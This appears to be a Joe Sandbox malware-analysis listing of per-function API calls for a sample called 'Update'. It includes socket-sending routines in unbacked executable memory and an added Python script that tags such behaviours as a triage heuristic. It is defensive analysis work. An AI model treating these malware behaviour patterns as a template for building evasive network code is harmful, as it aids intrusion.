                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37CBE0
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37CCB5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: 402420853c8b1dca1f7aff750b68c6a96c08ab5ca05ceffefb6f86b8ecbc0503
                                                                                            • Instruction ID: 3b7e10e160fd4c2db3a793241fc9bf44fb6595a831abb15ec74355c520189491
                                                                                            • Opcode Fuzzy Hash: 402420853c8b1dca1f7aff750b68c6a96c08ab5ca05ceffefb6f86b8ecbc0503
                                                                                            • Instruction Fuzzy Hash: 20418D71E016198FCF20EF98D840B9EB7B4FF48B18F044119D895AB780D739A905CFA9
                                                                                            APIs
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37B515
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C37B52F
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37B550
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C37B625
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
                                                                                             • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                            • String ID:
                                                                                            • API String ID: 593203224-0
                                                                                            • Opcode ID: 497e02e8ff61ea16193dd94cdbbada1622fe1d5ab92ec85729f6c76e8215517f
                                                                                            • Instruction ID: b0a5e642fce9594f7c319239fd8ce2fc15f1b04d2a1e7fcca0ce74b254a44918
                                                                                            • Opcode Fuzzy Hash: 497e02e8ff61ea16193dd94cdbbada1622fe1d5ab92ec85729f6c76e8215517f
                                                                                            • Instruction Fuzzy Hash: 35414871E002188FDB24DF94D850BEEB7B5FB54728F044228D895AB780DB39A904CFA9
                                                                                            APIs
                                                                                            • timeGetTime.WINMM ref: 00914425
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00914434
                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 00914482
                                                                                              • Part of subcall function 00913F37: GetCurrentThreadId.KERNEL32 ref: 00913F3C
                                                                                              • Part of subcall function 00913F37: send.WS2_32(?,10017440,00000010,00000000), ref: 00913F9D
                                                                                              • Part of subcall function 00913F37: SetEvent.KERNEL32(?), ref: 00913FC0
                                                                                              • Part of subcall function 00913F37: InterlockedExchange.KERNEL32(?,00000000), ref: 00913FCC
                                                                                              • Part of subcall function 00913F37: WSACloseEvent.WS2_32(?), ref: 00913FDA
                                                                                              • Part of subcall function 00913F37: shutdown.WS2_32(?,00000001), ref: 00913FF2
                                                                                              • Part of subcall function 00913F37: closesocket.WS2_32(?), ref: 00913FFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EventExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 4080316033-0
                                                                                            • Opcode ID: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                                            • Instruction ID: 5795f707d0d4caf0cb4e3edfe96a45ae7a677f41c8ffba43e8b08646f9fdcfb0
                                                                                            • Opcode Fuzzy Hash: cd026b78566f857b09982a36d15b79aaae0893a0b763f0313fae0352c7133491
                                                                                            • Instruction Fuzzy Hash: 0A218276600708ABD220EFA9DC85B97B3E8EF9D711F004A0EF54AC7690D671E444CBA0
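The function block above (timeGetTime, InterlockedExchange, a WaitForSingleObject with a fixed 0x1770 ms timeout, and a subcall that sends a 16-byte message before shutdown/closesocket) is the kind of routine that gets lost among hundreds of CRT and locale helpers in a listing this long. The script below is an added example written for this report, not Joe Sandbox code: it parses listing lines in the shape shown on this page (an `APIs` header, bullet lines of the form `Api.MODULE(args), ref: ADDR`, `Part of subcall function` lines, and the `Source File:` line), collects the API set per function, and tags behaviours such as a send plus shutdown/closesocket sequence. The sample text is constructed from lines on this page (the console-write routine at 6C3A1629 in the mapped DLL and the socket routine at 00914425 in the 00910000 region); the behaviour tags are this example's own heuristics, and reading the fifth dotted field of the `.sdmp` name as the Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE) is an assumption about Joe Sandbox's file naming, not something the report states.

```python
"""Parse Joe Sandbox per-function API listings and tag behaviours of interest.
Added example for this report, not Joe Sandbox code; input is the page's listing shape."""
import re

# Constructed sample in the shape of the page's listing: the CRT console-write
# routine from the mapped DLL at 0x6C370000 and the socket routine from the
# unbacked region at 0x910000.  Call lines are copied from the report.
SAMPLE = """\
APIs
• GetConsoleOutputCP.KERNEL32(F1BBC535,00000000,00000000,?), ref: 6C3A1629
  • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6C3A187B
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
APIs
• timeGetTime.WINMM ref: 00914425
• InterlockedExchange.KERNEL32(?,00000000), ref: 00914434
• WaitForSingleObject.KERNEL32(?,00001770), ref: 00914482
  • Part of subcall function 00913F37: send.WS2_32(?,10017440,00000010,00000000), ref: 00913F9D
  • Part of subcall function 00913F37: shutdown.WS2_32(?,00000001), ref: 00913FF2
  • Part of subcall function 00913F37: closesocket.WS2_32(?), ref: 00913FFC
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
SRC_RE = re.compile(
    r"Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)")

# Behaviour heuristics (this example's own, not sandbox signatures): a tag
# fires when every API in its set appears in the function or its subcalls.
BEHAVIOURS = {
    "socket_send": {"send"},
    "socket_teardown": {"shutdown", "closesocket"},
    "timed_wait": {"WaitForSingleObject"},
    "console_write": {"GetConsoleOutputCP", "WriteFile"},
}


def parse_blocks(text):
    """Split the listing into per-function blocks: API calls plus dump source."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"calls": [], "source": None}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            cur["calls"].append({"name": m["name"], "module": m["module"],
                                 "args": args, "ref": int(m["ref"], 16),
                                 "subcall": int(m["sub"], 16) if m["sub"] else None})
            continue
        s = SRC_RE.search(line)
        if s:
            cur["source"] = {"offset": int(s["offset"], 16), "pe_backed": s["pe"] == "true",
                             # Assumption: the 5th dotted field of the .sdmp name is
                             # the Win32 page protection of the region (0x40 = RWX).
                             "protect": int(s["file"].split(".")[4], 16)}
    return blocks


def wait_timeouts_ms(block):
    """Concrete timeouts handed to WaitForSingleObject (0x1770 -> 6000 ms)."""
    return [int(c["args"][1], 16) for c in block["calls"] if c["name"] ==
            "WaitForSingleObject" and len(c["args"]) == 2 and c["args"][1] != "?"]


def classify(block):
    """Behaviour tags for one function, plus the unbacked-RWX escalation."""
    names = {c["name"] for c in block["calls"]}
    tags = sorted(t for t, need in BEHAVIOURS.items() if need <= names)
    src = block["source"]
    if src and not src["pe_backed"] and src["protect"] == 0x40 and "socket_send" in tags:
        # Network code in RWX memory that no PE image backs is what an unpacked
        # or injected payload looks like: dump and carve that region first.
        tags.append("network_code_in_unbacked_rwx")
    return tags


def triage(text):
    """One summary record per function that actually lists API calls."""
    return [{"offset": (b["source"] or {}).get("offset"),
             "pe_backed": (b["source"] or {}).get("pe_backed"),
             "tags": classify(b), "waits_ms": wait_timeouts_ms(b)}
            for b in parse_blocks(text) if b["calls"]]


if __name__ == "__main__":
    for rec in triage(SAMPLE):
        print(rec)
```

Run as a script it prints one record per function. On the sample the socket routine comes out tagged `network_code_in_unbacked_rwx` because the report lists its region as `based on PE: false`, and its WaitForSingleObject timeout decodes to 6000 ms, a fixed interval worth comparing against the timing of the sample's C2 traffic; the DLL's console-write routine is tagged only `console_write` and can be deprioritised. Pasting the whole function section of a report into `triage` is the quickest way to separate the handful of functions in unbacked memory from the CRT noise.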
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                             • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: lstrlen$_memset
                                                                                            • String ID:
                                                                                            • API String ID: 2425037729-0
                                                                                            • Opcode ID: e54a1aaabb96ac8cc8f6053f85f1454f3428392b067993565249d0da5d1d39a3
                                                                                            • Instruction ID: 5b52a0bd93306e0c8014c17962d218b970f64436eb5f5629f07a4e35eef64cf2
                                                                                            • Opcode Fuzzy Hash: e54a1aaabb96ac8cc8f6053f85f1454f3428392b067993565249d0da5d1d39a3
                                                                                            • Instruction Fuzzy Hash: 4521C7767002189FCF14DF59DC809BFB3A9EBC4B23B1A40AFED058B701E731995186A4
APIs
  • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
• GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 6C39F6C9
• __dosmaperr.LIBCMT ref: 6C39F6D0
• GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6C39F70A
• __dosmaperr.LIBCMT ref: 6C39F711
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 6C3A0C90
  • Part of subcall function 6C39A751: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6C39D550,?,00000000,-00000008), ref: 6C39A7B2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C3A0CC8
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6C3A0CE8
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
• String ID:
• API String ID: 158306478-0
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,-00000A64,?,00000000,?,6C380BAE,?), ref: 6C3807C6
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?), ref: 6C380803
• WideCharToMultiByte.KERNEL32 ref: 6C380833
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 6C380862
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ByteCharMultiWide
• String ID:
• API String ID: 626452242-0
APIs
• SetLastError.KERNEL32(0000139F), ref: 009143C3
  • Part of subcall function 00911377: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 009113A2
  • Part of subcall function 00914C27: HeapFree.KERNEL32(?,00000000,?,00000000,00914E0C,?,0091429F,00914E0C,00000000,?,00000001,00914E0C,?), ref: 00914C4E
• SetLastError.KERNEL32(00000000,?), ref: 009143AE
• SetLastError.KERNEL32(00000057), ref: 009143D8
• WSAGetLastError.WS2_32(?), ref: 009143E7
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: ErrorLast$Heap$AllocateFree
• String ID:
• API String ID: 2037364846-0
APIs
• SetLastError.KERNEL32(0000139F), ref: 034E43EC
  • Part of subcall function 034E13A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 034E13CB
  • Part of subcall function 034E41E0: EnterCriticalSection.KERNEL32(034E4FB5,034E4E55,034E42BE,00000000,?,?,034E4E55,?,?,?,?,00000000,000000FF), ref: 034E41E8
  • Part of subcall function 034E41E0: LeaveCriticalSection.KERNEL32(034E4FB5,?,?,?,00000000,000000FF), ref: 034E41F6
  • Part of subcall function 034E4C70: HeapFree.KERNEL32(?,00000000,?,00000000,034E4E55,?,034E42C8,034E4E55,00000000,?,?,034E4E55,?), ref: 034E4C97
• SetLastError.KERNEL32(00000000,?), ref: 034E43D7
• SetLastError.KERNEL32(00000057), ref: 034E4401
• WSAGetLastError.WS2_32(?), ref: 034E4410
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
• String ID:
• API String ID: 2060118545-0
APIs
• _malloc.LIBCMT ref: 0091E5BC
  • Part of subcall function 00916E5A: __FF_MSGBANNER.LIBCMT ref: 00916E73
  • Part of subcall function 00916E5A: __NMSG_WRITE.LIBCMT ref: 00916E7A
  • Part of subcall function 00916E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 00916E9F
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: AllocateHeap_malloc
• String ID:
• API String ID: 501242067-0
APIs
• _free.LIBCMT ref: 034EDE93
• _free.LIBCMT ref: 034EDED5
• GetProcessHeap.KERNEL32(00000000,00000000,034EDC95), ref: 034EDEFC
• HeapFree.KERNEL32(00000000), ref: 034EDF03
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: Heap_free$FreeProcess
• String ID:
• API String ID: 1072109031-0
APIs
• WSAEventSelect.WS2_32(00913A92,00000001,00000023), ref: 00913BD9
• WSAGetLastError.WS2_32 ref: 00913BE4
• send.WS2_32(00000001,00000000,00000000,00000000), ref: 00913C2F
• WSAGetLastError.WS2_32 ref: 00913C3A
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: ErrorLast$EventSelectsend
• String ID:
• API String ID: 259408233-0
APIs
• WSAEventSelect.WS2_32(?,034E3ABB,00000023), ref: 034E3C02
• WSAGetLastError.WS2_32 ref: 034E3C0D
• send.WS2_32(?,00000000,00000000,00000000), ref: 034E3C58
• WSAGetLastError.WS2_32 ref: 034E3C63
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EventSelectsend
• String ID:
• API String ID: 259408233-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Yara matches
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
Memory Dump Source
• Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3040000_Update.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
• EnterCriticalSection.KERNEL32(034E4FB5,034E4E55,034E42BE,00000000,?,?,034E4E55,?,?,?,?,00000000,000000FF), ref: 034E41E8
• LeaveCriticalSection.KERNEL32(034E4FB5,?,?,?,00000000,000000FF), ref: 034E41F6
• LeaveCriticalSection.KERNEL32(034E4FB5), ref: 034E4257
• SetEvent.KERNEL32(8520468B), ref: 034E4272
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterEvent
• String ID:
• API String ID: 3394196147-0
APIs
• timeGetTime.WINMM(00000001,?,00000001,?,034E3C4F,?,?,00000001), ref: 034E4B15
• InterlockedIncrement.KERNEL32(00000001), ref: 034E4B24
• InterlockedIncrement.KERNEL32(00000001), ref: 034E4B31
• timeGetTime.WINMM(?,034E3C4F,?,?,00000001), ref: 034E4B48
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: IncrementInterlockedTimetime
• String ID:
• API String ID: 159728177-0
APIs
• CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 034E3667
• _free.LIBCMT ref: 034E369C
  • Part of subcall function 034EF639: RtlFreeHeap.NTDLL(00000000,00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF64F
  • Part of subcall function 034EF639: GetLastError.KERNEL32(00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000), ref: 034EF661
• _malloc.LIBCMT ref: 034E36D7
• _memset.LIBCMT ref: 034E36E5
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
• String ID:
• API String ID: 3340475617-0
APIs
• _malloc.LIBCMT ref: 00916F08
  • Part of subcall function 00916E5A: __FF_MSGBANNER.LIBCMT ref: 00916E73
  • Part of subcall function 00916E5A: __NMSG_WRITE.LIBCMT ref: 00916E7A
  • Part of subcall function 00916E5A: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 00916E9F
• std::exception::exception.LIBCMT ref: 00916F3D
• std::exception::exception.LIBCMT ref: 00916F57
• __CxxThrowException@8.LIBCMT ref: 00916F68
Memory Dump Source
• Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_910000_Update.jbxd
Similarity
• API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
• String ID:
• API String ID: 615853336-0
APIs
• _malloc.LIBCMT ref: 0304F0E0
  • Part of subcall function 0304F032: __FF_MSGBANNER.LIBCMT ref: 0304F04B
  • Part of subcall function 0304F032: __NMSG_WRITE.LIBCMT ref: 0304F052
• std::exception::exception.LIBCMT ref: 0304F115
• std::exception::exception.LIBCMT ref: 0304F12F
• __CxxThrowException@8.LIBCMT ref: 0304F140
Memory Dump Source
• Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_3040000_Update.jbxd
Similarity
• API ID: std::exception::exception$Exception@8Throw_malloc
• String ID:
• API String ID: 2388904642-0
APIs
  • Part of subcall function 034E1420: HeapFree.KERNEL32(?,00000000,?,?,?,034E40B1,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E143D
  • Part of subcall function 034E1420: _free.LIBCMT ref: 034E1459
• HeapDestroy.KERNEL32(00000000), ref: 034ECD93
• HeapCreate.KERNEL32(?,?,?), ref: 034ECDA5
• _free.LIBCMT ref: 034ECDB5
• HeapDestroy.KERNEL32 ref: 034ECDE2
Memory Dump Source
• Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
• Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
Similarity
• API ID: Heap$Destroy_free$CreateFree
• String ID:
• API String ID: 4097506873-0
APIs
• ReadConsoleInputW.KERNEL32(0000000C,6C3B9D90,6C393444,00000000,?,6C3934C8,00000000,00000001,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0A9D
• GetLastError.KERNEL32(?,6C3934C8,00000000,00000001,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0AA9
  • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
• ___initconin.LIBCMT ref: 6C3A0AB9
  • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
• ReadConsoleInputW.KERNEL32(0000000C,6C3B9D90,6C393444,?,6C3934C8,00000000,00000001,?,6C3B9DB0,00000038,6C393444,6C3B9D90,0000000C,6C371B30), ref: 6C3A0ACD
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
Similarity
• API ID: ConsoleInputRead$CloseCreateErrorFileHandleLast___initconin
• String ID:
• API String ID: 838051604-0
APIs
• GetNumberOfConsoleInputEvents.KERNEL32(?,?,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0AE9
• GetLastError.KERNEL32(?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0AF5
  • Part of subcall function 6C3A0C1D: CloseHandle.KERNEL32(FFFFFFFF,6C3A0B05,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C2D
• ___initconin.LIBCMT ref: 6C3A0B05
  • Part of subcall function 6C3A0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6C3A0A79,6C3936CB,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0C11
• GetNumberOfConsoleInputEvents.KERNEL32(?,?,6C3936DC,0000000C,66666667,?,?,6C3933F4,6C3B9D70,0000000C,6C371B27), ref: 6C3A0B13
Memory Dump Source
• Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
• Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmp
